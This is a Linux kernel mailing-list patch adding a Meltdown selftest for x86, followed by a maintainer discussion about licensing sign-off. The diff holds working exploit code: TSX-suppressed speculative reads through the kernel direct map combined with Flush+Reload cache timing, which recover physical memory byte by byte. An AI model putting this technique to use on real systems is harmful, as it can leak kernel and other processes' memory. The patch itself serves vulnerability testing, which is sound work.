[RFC,v3] selftest/x86/meltdown: Add a selftest for meltdown

Message ID Y3L2Jx3Kx9q8Dv55@ziqianlu-desk1
State New
Headers
Series [RFC,v3] selftest/x86/meltdown: Add a selftest for meltdown |

Commit Message

Aaron Lu Nov. 15, 2022, 2:15 a.m. UTC
  To capture potential programming errors like mistakenly setting Global
bit on kernel page table entries, a selftest for meltdown is added.

This selftest is based on https://github.com/IAIK/meltdown. What this
test does is to firstly set a predefined string at a random user address
and then with pagemap, get the physical address of this string. Finally,
try to fetch the data using kernel's directmap address for this physical
address to see if user space can use kernel's page table.

Per my tests, this test works well on CPUs that have TSX support. For
this reason, this selftest only works on CPUs that supports TSX.

This test requires the knowledge of direct map base. IAIK used the
following two methods to get direct map base:
1 through a kernel module to show phys_to_virt(0);
2 by exploiting the same HW vulnerability to guess the base.
Method 1 makes running this selftest complex while method 2 is not
reliable and I do not want to use a possibly wrong value to run this
test. Suggestions are welcome.

Tested on both x86_64 and i386_pae VMs on a host with i7-7700K cpu,
success rate is about 50% when nopti kernel cmdline is used.

As for legal stuff:

Add an Intel copyright notice because of a significant contribution to
this code. This also makes it clear who did the relicensing from Zlib
to GPLv2.

Also, just to be crystal clear, I have included my Signed-off-by on this
contribution because I certify that (from submitting-patches.rst):

   (b) The contribution is based upon previous work that, to the best
       of my knowledge, is covered under an appropriate open source
       license and I have the right under that license to submit that
       work with modifications, whether created in whole or in part
       by me, under the same open source license (unless I am
       permitted to submit under a different license), as indicated
       in the file; or

In this case, I have the right under the license to submit this work.
That license also permits me to relicense to GPLv2 and submit under the
new license.

I came to the conclusion that this work is OK to submit with all of the
steps I listed above (copyright notices, license terms and relicensing)
by strictly following all of the processes required by my employer.

This does not include a Signed-off-by from a corporate attorney.
Instead, I offer the next best thing: an ack from one of the maintainers
of this code who can also attest to this having followed all of the
proper processes of our employer.

[dhansen: advice on changelog of the legal part]
Signed-off-by: Aaron Lu <aaron.lu@intel.com>
Acked-by: Dave Hansen <dave.hansen@linux.intel.com> # Intel licensing process
---
v3: address legal related concerns raised from Greg KH by adding Intel
copyright in the header and explain in the changelog, no code change.

 tools/testing/selftests/x86/Makefile   |   2 +-
 tools/testing/selftests/x86/meltdown.c | 420 +++++++++++++++++++++++++
 2 files changed, 421 insertions(+), 1 deletion(-)
 create mode 100644 tools/testing/selftests/x86/meltdown.c
  

Comments

Greg KH Nov. 15, 2022, 6:54 a.m. UTC | #1
On Tue, Nov 15, 2022 at 10:15:03AM +0800, Aaron Lu wrote:
> I came to the conclusion that this work is OK to submit with all of the
> steps I listed above (copyright notices, license terms and relicensing)
> by strictly following all of the processes required by my employer.
> 
> This does not include a Signed-off-by from a corporate attorney.

Please get that, as that is what I asked for in order for us to be able
to accept this type of change.

thanks,

greg k-h
  
Dave Hansen Nov. 16, 2022, 10:57 p.m. UTC | #2
On 11/14/22 22:54, Greg KH wrote:
> On Tue, Nov 15, 2022 at 10:15:03AM +0800, Aaron Lu wrote:
>> I came to the conclusion that this work is OK to submit with all of the
>> steps I listed above (copyright notices, license terms and relicensing)
>> by strictly following all of the processes required by my employer.
>>
>> This does not include a Signed-off-by from a corporate attorney.
> Please get that, as that is what I asked for in order for us to be able
> to accept this type of change.

Hi Greg,

Can you share any more of what triggered this new requirement?

We can, for instance, be flexible on the license that this is submitted
with (original zlib versus GPLv2).  I've also been in contact with the
(presumed) original authors of this code in the past.  If there are
concerns about its provenance, I'd be happy to try to work with them to
get it in to shape.

But, I feel like I'm poking around in the dark here.  I'm not quite sure
what triggered this new requirement or quite how to remedy it.

I'm also a _bit_ worried that I as a maintainer was about to do
something wrong here.  Personally, I'm quite happy with Aaron's due
diligence here and I was *really* close to merging this code.  Is there
some documentation that could be improved here?
  
Greg KH Nov. 17, 2022, 6:10 a.m. UTC | #3
On Wed, Nov 16, 2022 at 02:57:22PM -0800, Dave Hansen wrote:
> On 11/14/22 22:54, Greg KH wrote:
> > On Tue, Nov 15, 2022 at 10:15:03AM +0800, Aaron Lu wrote:
> >> I came to the conclusion that this work is OK to submit with all of the
> >> steps I listed above (copyright notices, license terms and relicensing)
> >> by strictly following all of the processes required by my employer.
> >>
> >> This does not include a Signed-off-by from a corporate attorney.
> > Please get that, as that is what I asked for in order for us to be able
> > to accept this type of change.
> 
> Hi Greg,
> 
> Can you share any more of what triggered this new requirement?

You are taking source from a non-Intel developer under a different
license and adding copyright and different license information to it.
Because of all of that, I have the requirement that I want to know that
Intel legal has vetted all of this and agrees with the conclusions that
you all are stating.

This isn't a new type of requirement, I make this request to many other
companies that do things that are not "normal" when it comes to licenses
and copyrights so as to ensure that all is ok.

thanks,

greg k-h
  
Dave Hansen Nov. 17, 2022, 6:43 p.m. UTC | #4
On 11/16/22 22:10, Greg KH wrote:
> On Wed, Nov 16, 2022 at 02:57:22PM -0800, Dave Hansen wrote:
>> On 11/14/22 22:54, Greg KH wrote:
>>> On Tue, Nov 15, 2022 at 10:15:03AM +0800, Aaron Lu wrote:
>>>> I came to the conclusion that this work is OK to submit with all of the
>>>> steps I listed above (copyright notices, license terms and relicensing)
>>>> by strictly following all of the processes required by my employer.
>>>>
>>>> This does not include a Signed-off-by from a corporate attorney.
>>> Please get that, as that is what I asked for in order for us to be able
>>> to accept this type of change.
>> Hi Greg,
>>
>> Can you share any more of what triggered this new requirement?
> You are taking source from a non-Intel developer under a different
> license and adding copyright and different license information to it.
> Because of all of that, I have the requirement that I want to know that
> Intel legal has vetted all of this and agrees with the conclusions that
> you all are stating.

I rarely speak "for Intel".  But, this is one case where I believe that
I can.  The Intel processes have been thoroughly and diligently followed
here.  Speaking for Intel: yes, this has been vetted and those
statements are as official as a statement from Intel can be.

Also, to reiterate my earlier offer: I believe Aaron can be flexible in
both the license under which this is submitted and the presence of an
explicit Intel copyright notice.  If modifications there would help ease
your concerns, we'd be happy to explore changes.

I also recognize that there can be legitimate differences of opinion
about what constitutes a 'valid' licensing decision.  It's quite
possible that the advice we're getting from folks at Intel differs the
advise that others get.  If that's happening, I'd love to find a way
forward that allows that legitimate difference of opinion to persist
while also getting a selftest in the kernel that I believe will find
real bugs.
  

Patch

diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
index 0388c4d60af0..36f99c360a56 100644
--- a/tools/testing/selftests/x86/Makefile
+++ b/tools/testing/selftests/x86/Makefile
@@ -13,7 +13,7 @@  CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie)
 TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \
 			check_initial_reg_state sigreturn iopl ioperm \
 			test_vsyscall mov_ss_trap \
-			syscall_arg_fault fsgsbase_restore sigaltstack
+			syscall_arg_fault fsgsbase_restore sigaltstack meltdown
 TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \
 			test_FCMOV test_FCOMI test_FISTTP \
 			vdso_restorer
diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c
new file mode 100644
index 000000000000..0ad4b65adcd0
--- /dev/null
+++ b/tools/testing/selftests/x86/meltdown.c
@@ -0,0 +1,420 @@ 
+// SPDX-License-Identifier: GPL-2.0-only
+/*
+ * Copyright (c) 2022 Intel
+ *
+ * This selftest is based on code from https://github.com/IAIK/meltdown
+ * and can be used to check if user space can read data through kernel
+ * page table entries.
+ *
+ * Note for i386 test: due to kernel prefer to use high memory for user
+ * programs, it is necessary to restrict the available memory under that
+ * of low memory size(around ~896MiB) so that the memory hosting "string"
+ * in main() is directly mapped.
+ *
+ * Note for both x86_64 and i386 test: the hardware race window can not be
+ * exploited 100% each time so a single run of the test on a vulnerable system
+ * may not FAIL. My tests on a i7-7700K cpu have a success rate about 50%.
+ *
+ * The original copyright and license information are shown below:
+ *
+ * Copyright (c) 2018 meltdown
+ *
+ * This software is provided 'as-is', without any express or implied
+ * warranty. In no event will the authors be held liable for any damages
+ * arising from the use of this software.
+ *
+ * Permission is granted to anyone to use this software for any purpose,
+ * including commercial applications, and to alter it and redistribute it
+ * freely, subject to the following restrictions:
+ *
+ *    1. The origin of this software must not be misrepresented; you must not
+ *    claim that you wrote the original software. If you use this software
+ *    in a product, an acknowledgment in the product documentation would be
+ *    appreciated but is not required.
+ *
+ *    2. Altered source versions must be plainly marked as such, and must not be
+ *    misrepresented as being the original software.
+ *
+ *    3. This notice may not be removed or altered from any source
+ *    distribution.
+ */
+
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <cpuid.h>
+#include <errno.h>
+#include <err.h>
+#include <sys/mman.h>
+#include <sys/utsname.h>
+
+#define PAGE_SHIFT	12
+#define PAGE_SIZE	0x1000
+#define PUD_SHIFT	30
+#define PUD_SIZE	(1UL << PUD_SHIFT)
+#define PUD_MASK	(~(PUD_SIZE - 1))
+
+#define _XBEGIN_STARTED	(~0u)
+
+/* configurables */
+#define NR_MEASUREMENTS	3
+#define NR_TRIES	10000
+
+size_t cache_miss_threshold;
+unsigned long directmap_base;
+
+static int get_directmap_base(void)
+{
+	char *buf;
+	FILE *fp;
+	size_t n;
+	int ret;
+
+	fp = fopen("/sys/kernel/debug/page_tables/kernel", "r");
+	if (!fp)
+		return -1;
+
+	buf = NULL;
+	ret = -1;
+	while (getline(&buf, &n, fp) != -1) {
+		if (!strstr(buf, "Kernel Mapping"))
+			continue;
+
+		if (getline(&buf, &n, fp) != -1 &&
+		    sscanf(buf, "0x%lx", &directmap_base) == 1) {
+			printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK);
+			directmap_base &= PUD_MASK;
+			ret = 0;
+			break;
+		}
+	}
+
+	fclose(fp);
+	free(buf);
+	return ret;
+}
+
+/*
+ * Requires root due to pagemap.
+ */
+static int virt_to_phys(unsigned long virt, unsigned long *phys)
+{
+	unsigned long pfn;
+	uint64_t val;
+	int fd, ret;
+
+	fd = open("/proc/self/pagemap", O_RDONLY);
+	if (fd == -1) {
+		printf("[INFO]\tFailed to open pagemap\n");
+		return -1;
+	}
+
+	ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t));
+	if (ret == -1) {
+		printf("[INFO]\tFailed to read pagemap\n");
+		goto out;
+	}
+
+	if (!(val & (1ULL << 63))) {
+		printf("[INFO]\tPage not present according to pagemap\n");
+		ret = -1;
+		goto out;
+	}
+
+	pfn = val & ((1ULL << 55) - 1);
+	if (pfn == 0) {
+		printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n");
+		ret = -1;
+		goto out;
+	}
+
+	ret = 0;
+	*phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1));
+
+out:
+	close(fd);
+	return ret;
+}
+
+static uint64_t rdtsc()
+{
+	uint64_t a = 0, d = 0;
+
+	asm volatile("mfence");
+#ifdef __x86_64__
+	asm volatile("rdtsc" : "=a"(a), "=d"(d));
+#else
+	asm volatile("rdtsc" : "=A"(a));
+#endif
+	a = (d << 32) | a;
+	asm volatile("mfence");
+
+	return a;
+}
+
+#ifdef __x86_64__
+static void maccess(void *p)
+{
+	asm volatile("movq (%0), %%rax\n" : : "c"(p) : "rax");
+}
+
+static void flush(void *p)
+{
+	asm volatile("clflush 0(%0)\n" : : "c"(p) : "rax");
+}
+
+#define MELTDOWN					\
+	asm volatile("1:\n"				\
+		     "movzx (%%rcx), %%rax\n"		\
+		     "shl $12, %%rax\n"			\
+		     "jz 1b\n"				\
+		     "movq (%%rbx,%%rax,1), %%rbx\n"	\
+		     :					\
+		     : "c"(virt), "b"(array)		\
+		     : "rax");
+#else
+static void maccess(void *p)
+{
+	asm volatile("movl (%0), %%eax\n" : : "c"(p) : "eax");
+}
+
+static void flush(void *p)
+{
+	asm volatile("clflush 0(%0)\n" : : "c"(p) : "eax");
+}
+
+#define MELTDOWN					\
+	asm volatile("1:\n"				\
+		     "movzx (%%ecx), %%eax\n"		\
+		     "shl $12, %%eax\n"			\
+		     "jz 1b\n"				\
+		     "mov (%%ebx,%%eax,1), %%ebx\n"	\
+		     :					\
+		     : "c"(virt), "b"(array)		\
+		     : "eax");
+#endif
+
+static void detect_flush_reload_threshold()
+{
+	size_t reload_time = 0, flush_reload_time = 0, i, count = 1000000;
+	size_t dummy[16];
+	size_t *ptr = dummy + 8;
+	uint64_t start = 0, end = 0;
+
+	maccess(ptr);
+	for (i = 0; i < count; i++) {
+		start = rdtsc();
+		maccess(ptr);
+		end = rdtsc();
+		reload_time += (end - start);
+	}
+
+	for (i = 0; i < count; i++) {
+		start = rdtsc();
+		maccess(ptr);
+		end = rdtsc();
+		flush(ptr);
+		flush_reload_time += (end - start);
+	}
+
+	reload_time /= count;
+	flush_reload_time /= count;
+
+	printf("[INFO]\tFlush+Reload: %zd cycles, Reload only: %zd cycles\n",
+			flush_reload_time, reload_time);
+	cache_miss_threshold = (flush_reload_time + reload_time * 2) / 3;
+	printf("[INFO]\tFlush+Reload threshold: %zd cycles\n", cache_miss_threshold);
+}
+
+static int flush_reload(void *ptr)
+{
+	uint64_t start, end;
+
+	start = rdtsc();
+	maccess(ptr);
+	end = rdtsc();
+
+	flush(ptr);
+
+	if (end - start < cache_miss_threshold)
+		return 1;
+
+	return 0;
+}
+
+static int check_tsx()
+{
+	if (__get_cpuid_max(0, NULL) >= 7) {
+		unsigned a, b, c, d;
+		__cpuid_count(7, 0, a, b, c, d);
+		return (b & (1 << 11)) ? 1 : 0;
+	} else
+		return 0;
+}
+
+static unsigned int xbegin(void)
+{
+	unsigned int status;
+
+	asm volatile("xbegin 1f \n 1:" : "=a"(status) : "a"(-1UL) : "memory");
+	asm volatile(".byte 0xc7,0xf8,0x00,0x00,0x00,0x00" : "=a"(status) : "a"(-1UL) : "memory");
+
+	return status;
+}
+
+static void xend(void)
+{
+	asm volatile("xend" ::: "memory");
+	asm volatile(".byte 0x0f; .byte 0x01; .byte 0xd5" ::: "memory");
+}
+
+static int __read_phys_memory_tsx(unsigned long phys, char *array)
+{
+	unsigned long virt;
+	int i, retries;
+
+	virt = phys + directmap_base;
+	for (retries = 0; retries < NR_TRIES; retries++) {
+		if (xbegin() == _XBEGIN_STARTED) {
+			MELTDOWN;
+			xend();
+		}
+
+		for (i = 1; i < 256; i++) {
+			if (flush_reload(array + i * PAGE_SIZE))
+				return i;
+		}
+	}
+
+	return 0;
+}
+
+/*
+ * Read physical memory by exploiting HW bugs.
+ * One byte a time.
+ */
+static int read_phys_memory(unsigned long phys, char *array)
+{
+	char res_stat[256];
+	int i, r, max_v, max_i;
+
+	memset(res_stat, 0, sizeof(res_stat));
+
+	for (i = 0; i < NR_MEASUREMENTS; i++) {
+		for (i = 0; i < 256; i++)
+			flush(array + i * PAGE_SIZE);
+
+		r = __read_phys_memory_tsx(phys, array);
+		if (r != 0)
+			res_stat[r]++;
+	}
+
+	max_v = 0;
+	for (i = 1; i < 256; i++) {
+		if (res_stat[i] > max_v) {
+			max_i = i;
+			max_v = res_stat[i];
+		}
+	}
+
+	if (max_v == 0)
+		return 0;
+
+	return max_i;
+}
+
+#ifdef __i386
+/* 32 bits version is only meant to run on a PAE kernel */
+static int arch_test_mismatch(void)
+{
+	struct utsname buf;
+
+	if (uname(&buf) == -1) {
+		printf("[SKIP]\tCan't decide architecture\n");
+		return 1;
+	}
+
+	if (!strncmp(buf.machine, "x86_64", 6)) {
+		printf("[SKIP]\tNo need to run 32bits test on 64bits host\n");
+		return 1;
+	}
+
+	return 0;
+}
+#else
+static int arch_test_mismatch(void)
+{
+	return 0;
+}
+#endif
+
+static int test_meltdown(void)
+{
+	char string[] = "test string";
+	char *array, *result;
+	unsigned long phys;
+	int i, len, ret;
+
+	if (arch_test_mismatch())
+		return 0;
+
+	if (get_directmap_base() == -1) {
+		printf("[SKIP]\tFailed to get directmap base. Make sure you are root and kernel has CONFIG_PTDUMP_DEBUGFS\n");
+		return 0;
+	}
+
+	detect_flush_reload_threshold();
+
+	if (!check_tsx()) {
+		printf("[SKIP]\tNo TSX support\n");
+		return 0;
+	}
+
+	if (virt_to_phys((unsigned long)string, &phys) == -1) {
+		printf("[FAIL]\tFailed to convert virtual address to physical address\n");
+		return -1;
+	}
+
+	len = strlen(string);
+	result = malloc(len + 1);
+	if (!result) {
+		printf("[FAIL]\tNot enough memory for malloc\n");
+		return -1;
+	}
+	memset(result, 0, len + 1);
+
+	array = mmap(NULL, 256 * PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+	if (!array) {
+		printf("[FAIL]\tNot enough memory for mmap\n");
+		free(result);
+		return -1;
+	}
+	memset(array, 0, 256 * PAGE_SIZE);
+
+	for (i = 0; i < len; i++, phys++) {
+		result[i] = read_phys_memory(phys, array);
+		if (result[i] == 0)
+			break;
+	}
+
+	ret = !strncmp(string, result, len);
+	if (ret)
+		printf("[FAIL]\tSystem is vulnerable to meltdown.\n");
+	else
+		printf("[OK]\tSystem might not be vulnerable to meltdown.\n");
+
+	munmap(array, 256 * PAGE_SIZE);
+	free(result);
+
+	return ret;
+}
+
+int main(void)
+{
+	printf("[RUN]\tTest if system is vulnerable to meltdown\n");
+
+	return test_meltdown();
+}